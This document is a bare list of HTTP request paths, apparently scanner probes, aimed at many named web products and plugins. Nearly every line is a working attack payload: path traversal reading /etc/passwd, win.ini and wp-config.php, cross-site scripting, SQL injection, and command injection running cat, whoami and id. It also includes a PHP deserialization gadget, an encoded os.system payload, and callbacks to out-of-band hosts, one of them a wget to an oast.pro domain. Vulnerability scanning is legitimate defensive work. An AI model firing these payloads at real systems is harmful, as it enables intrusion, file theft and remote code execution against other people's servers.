/html/common/forward_js.jsp?FORWARD_URL=http://evil.com
/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com
/manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064
/manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064
/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine
/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f
/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html
/index.php?q=file:///etc/passwd
/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs
/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E
/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs
/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8
/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1
/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
/imcat/root/tools/adbug/binfo.php?phpinfo1
/wp-content/plugins/wp-payeezy-pay/donate.php
/XMLCHART
/OA_HTML/lcmServiceController.jsp
/php/upload.php
/Uploads/2Y9k9vGwXfLTgf2kxvNkZQ3VASJ.php7
/assets/file:%2f%2f/etc/passwd
/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm
/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>"><script>alert(document.domain)</script>
/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd
/include/downmix.inc.php
/login.php
/ws_utc/resources/setting/options
/ws_utc/resources/setting/keystore
/anchor/errors.log
/wp-admin/options-general.php?page=smartcode
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes
/tag_test_action.php?url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}
/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68
/webtools/control/xmlrpc
/redirector.php?url=https://interact.sh
/redirector.php?do=nodelay&url=https://interact.sh
/Admin
/wp-content/uploads/wp-security-audit-log/failed-logins/
/.../.../.../.../.../.../.../.../.../windows/win.ini
/tests/generate.php
/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
/cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq"><script>alert(document.domain)</script>
/user/scripts/login_par.js
/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
/cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/includes/mysql2i/mysql2i.func.php
/device.rsp?opt=user&cmd=list
/addons/phpmailer/phpmailer.php
/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData
/http%3A%2F%2Fwww.interact.sh
/%5cgoogle.com/evil.html
/timesheet/login.php
/modules/babel/redirect.php?newurl=http://interact.sh
/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter&nodeFilteringType=ALL&nodeFilter&launcherFilteringType=ALL&launcherFilter&causeFilteringType=ALL&causeFilter&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
/api/filemanager?path=%2F..%2f..%2fContent
/checkValid
/printenv.shtml?%3Cscript%3Ealert%28474995577%29%3C%2Fscript%3E
/ssi/printenv.shtml?%3Cscript%3Ealert%28474995577%29%3C%2Fscript%3E
/whoAmI/
/whoAmI/
/secure/ContactAdministrators!default.jspa
/LetsEncrypt/Index?fileName=/etc/passwd
/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E
/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>
/free_time.cgi
/phpmyadmin/
/debug/pprof/
/debug/pprof/goroutine?debug=1
/config/pw_snmp_done.html
/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW
/config/pw_snmp.html
/mobile/index.php
/crowd/admin/uploadplugin.action
/crowd/plugins/servlet/exp
/wp-admin/options-general.php?page=yuzo-related-post
/wan.htm
/NateMail.php
/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29
/login
/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php
/share/page/dologin
/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error&error_description=%3Csvg/onload=alert(1)%3E
/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://
/password_change.cgi
/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/WealthT24/GetImage?docDownloadPath=/etc/passwd
/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini
/wp-content/plugins/insert-php/readme.txt
/password.jsn
/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc
/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username
/api/users
/catalog.php?filename=../../../../../../../../../etc/passwd
/.%0d./.%0d./.%0d./.%0d./bin/sh
/login
/Collector/appliancesettings/applianceSettingsFileTransfer
/talari/app/files/2Y9k9iYGniR4tolsm1CDSFb9NC7
/action/usermanager.htm
/wp-content/plugins/checklist/images/checklist-icon.php?fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/cgi-bin/config.exp
/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/ajax/render/widget_tabbedcontainer_tab_panel
/wp-json/visualizer/v1/update-chart
/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23
/admin/?n=language&c=language_general&a=doExportPack
/wp-json/visualizer/v1/upload-data
/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin
/base_import/static/c:/windows/win.ini
/web/static/c:/windows/win.ini
/base/static/c:/windows/win.ini
/pages/systemcall.php?command=cat%20/etc/passwd
/ui/api/v1/ui/auth/login
/session_login.cgi
/rpc.cgi
/session_login.cgi
/rpc.cgi
/getcfg.php
/jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd
/api-third-party/download/extdisks../etc/passwd
/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd
/plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml
/admin/auth/reset-password
/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)
/_syslog.txt
/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/Login?!'><sVg/OnLoAD=alert`1337`//
/vpn/../vpns/cfg/smb.conf
/boafrm/formSysCmd
/osm/REGISTER.cmd
/osm_tiles/REGISTER.cmd
/apply_sec.cgi
/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C
/apply_sec.cgi
/apply_sec.cgi
/servlet/UploadServlet
/test.txt
/wp-admin/admin.php?page=download_report&report=users&status=all
/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences
/dashboard/uploadID.php
/query?db=db&q=SHOW%20DATABASES
/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/rest/tinymce/1/macro/preview
/secure/ManageFilters.jspa?filter=popular&filterView=popular
/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
/rest/api/2/user/picker?query
/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd
/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL
/labkey/__r1/login-login.view?returnUrl=http://interact.sh
/data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)>
/admin/data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)>
/photo/p/api/album.php
/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E
/node/1?_format=hal_json
/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences
/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots
/%0d%0aSet-Cookie:crlfinjection=1;
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType
/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
/service/extdirect
/index.php/login
/adxmlrpc.php
/plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id
/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/updating.jsp?url=https://interact.sh/
/cgi-bin/supportInstaller
/api/timelion/run
/rest/issueNav/1/issueTable
/wls-wsat/CoordinatorPortType
/_async/AsyncResponseService
/_async/favicon.ico
/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20TXAinVurlk.txt%60
/TXAinVurlk.txt
/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/kindeditor/php/demo.php
/php/demo.php
/Autodiscover/Autodiscover.xml
/content/2Y9kAbjCwTXVDTO0PTd3jkWFJnf
/content/2Y9kAbjCwTXVDTO0PTd3jkWFJnf.af.internalsubmit.json
/s/2Y9kAaGGdxVfKuUI5EB4Ad1mR5o/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/s/2Y9kAaGGdxVfKuUI5EB4Ad1mR5o/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/artifactory/ui/auth/login?_spring_security_remember_me=false
/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd
/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://cl9hkovpu5aci1q5grr0pqqxbc8r7puc9.oast.pro
/ReportServer/Pages/ReportViewer.aspx
/objects/getImage.php?base64Url=YGlkID4gdnhxcngudHh0YA===&format=png
/objects/getImageMP4.php?base64Url=YGlkID4gdnhxcngudHh0YA===&format=jpg
/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gdnhxcngudHh0YA===&format=jpg
/objects/vxqrx.txt
/search/
/search/
/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('999999999'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--
/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+
/service/rapture/session
/service/rest/beta/repositories/bower/group
/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains
/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains
/MicroStrategyWS/happyaxis.jsp
/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains
/backupsettings.dat
/web.config.i18n.ashx?l=ouziw&v=ouziw
/SWNetPerfMon.db.i18n.ashx?l=ouziw&v=ouziw
/api/snapshots
/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
/%252f%255cinteract.sh%252fa%253fb/
/wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A)
/mailingupgrade.php
/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
/ucmdb-api/connect
/does_not_exist%22%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E%3Cimg%20src=x
/login.php
/v2/api/product/manger/getInfo
/login.php
/index.php?redirect=/\/interact.sh/
/index.php?redirect=//interact.sh
/cgi-bin/ExportAllSettings.sh
/files/ldap.debug.txt
/ajax/api/content_infraction/getIndexableContent
/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php
/index.php?pma_servername=cl9hkovpu5aci1q5grr0iryx5f38pz97d.oast.pro&pma_username=2Y9kAGs6Nz7FysHdYYkOHy5nCXH&pma_password=2Y9kAGs6Nz7FysHdYYkOHy5nCXH&server=1
/pma/index.php?pma_servername=cl9hkovpu5aci1q5grr0549hoxaepeto9.oast.pro&pma_username=2Y9kAGs6Nz7FysHdYYkOHy5nCXH&pma_password=2Y9kAGs6Nz7FysHdYYkOHy5nCXH&server=1
/pmd/index.php?pma_servername=cl9hkovpu5aci1q5grr0gyfbtytt6ay6d.oast.pro&pma_username=2Y9kAGs6Nz7FysHdYYkOHy5nCXH&pma_password=2Y9kAGs6Nz7FysHdYYkOHy5nCXH&server=1
/phpMyAdmin/index.php?pma_servername=cl9hkovpu5aci1q5grr0uopcsizztduw5.oast.pro&pma_username=2Y9kAGs6Nz7FysHdYYkOHy5nCXH&pma_password=2Y9kAGs6Nz7FysHdYYkOHy5nCXH&server=1
/phpmyadmin/index.php?pma_servername=cl9hkovpu5aci1q5grr0ewbmm5dctp75i.oast.pro&pma_username=2Y9kAGs6Nz7FysHdYYkOHy5nCXH&pma_password=2Y9kAGs6Nz7FysHdYYkOHy5nCXH&server=1
/_phpmyadmin/index.php?pma_servername=cl9hkovpu5aci1q5grr0qymez4cs5po96.oast.pro&pma_username=2Y9kAGs6Nz7FysHdYYkOHy5nCXH&pma_password=2Y9kAGs6Nz7FysHdYYkOHy5nCXH&server=1
/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/wp-json/acf/v3/options/a?id=active&field=plugins
/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)
/pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1
/api/experimental/latest_runs
/kylin/api/admin/config
/public/login.htm?type=probes
/context.json
/public/login.htm?type=requests
/user/login
/public/login.htm?type=treestat
/wp-admin/admin-ajax.php
/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2Y9k9rcOcFGGAzIdFhUYNeg611v.txt
/api/experimental/test
/api/experimental/dags/example_trigger_target_dag/paused/false
/api/experimental/dags/example_trigger_target_dag/dag_runs
/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6c6b35613046455955526b63554e556431687a62566f33636d39755247687859306f3122207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5
service_manager_data.php"
/webadmin/out
/secure/QueryComponent!Default.jspa
/secure/ViewUserHover.jspa
/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1
/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1
/auth/login?to=/92874%27;alert(document.domain)//280
/console/css/%252e%252e%252fconsole.portal
/bitrix/components/bitrix/mobileapp.list/ajax.php/?AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>
/bitrix/components/bitrix/mobileapp.list/ajax.php/?AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E
/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
/lib/crud/userprocess.php
/login.php
/lib/crud/userprocess.php
/apisix/admin/routes
/2Y9kAV5me4ylHQMPhQ6Rrzn6GIk?cmd=id
/console/images/%252e%252e%252fconsole.portal
/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1
/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==
/mifs/.;/services/LogService
/analytics/saw.dll?bieehome&startPage=1
/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/user/login
/module/
/module/
/module/
/info.php?RESULT=",msgArray);alert(document.domain);//
/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING
/run
/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F
/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
/ajax/render/widget_tabbedcontainer_tab_panel
/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Ezfvx.txt
/include/zfvx.txt
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text
/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>
/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C
/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B
/user/login.php, referrer: "xss"/><img src="#" onerror="alert(document.domain)"/>"
/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++
/fuel/login/
/fuel/login/
/fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0
/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/forgot_password.php
/login
/jars/upload
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc
/admin/
/admin/
/plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin
/whoAmI/
/plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27
/whoAmI/
/plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23
/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23
/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh
/wp-admin/admin-ajax.php?action=moove_read_xml
/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/wp-content/uploads/wp-file-manager-pro/fm_backup/
/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/find_v2/_click?_t_id&_t_q&_t_hit.id&_t_redirect=https://interact.sh
/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/ajax/apps/manifests?action=all&format=debug&xss=<script>alert(document.domain);</script>
/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script>
/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/infusions/downloads/downloads.php?cat_id=${system(ls)}
/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image
/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image
/config/getuser?index=0
/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/2Y9kA0nDgzdGTzlRlDDOjOOP5ul/)%3C%2Fscript%3E
/checkValid
/console/login/LoginForm.jsp
/public/css/2Y9kATEzCj5qP3N2X6xP3aap4S3.css
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd
/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a)
/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb
/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd
/api/config
/api/graphql
/wp-json/wp/v2/lesson/1
/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net
/index.php?page&action=edit&f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&restore=1
/manage/fileDownloader?sec=1
/pme/media/
/wp-admin/admin-ajax.php
/index.php?download=/etc/passwd
/v1/kv/2Y9kAXDFjzU4qjFExpI5pKl3R2o?raw
/help/english/index.html?javascript:alert(document.domain)
/setup.cgi?todo=debug&x=currentsetting.htm
/assets/_core/php/profile.php
/assets/php/profile.php
/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
/vendor/qcubed/qcubed/assets/php/profile.php
/api/settings/values
/api/v1/method.callAnon/sendForgotPasswordEmail
/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E
/index.php?page=/etc/passwd%00
/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-
/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E
/tos/index.php?user/login
/wizard/initialise.php
/+CSCOE+/session_password.html
/server/
/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://cl9hkovpu5aci1q5grr05ouwpst3jteoj.oast.pro%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
/wp-content/plugins/contact-form-7/readme.txt
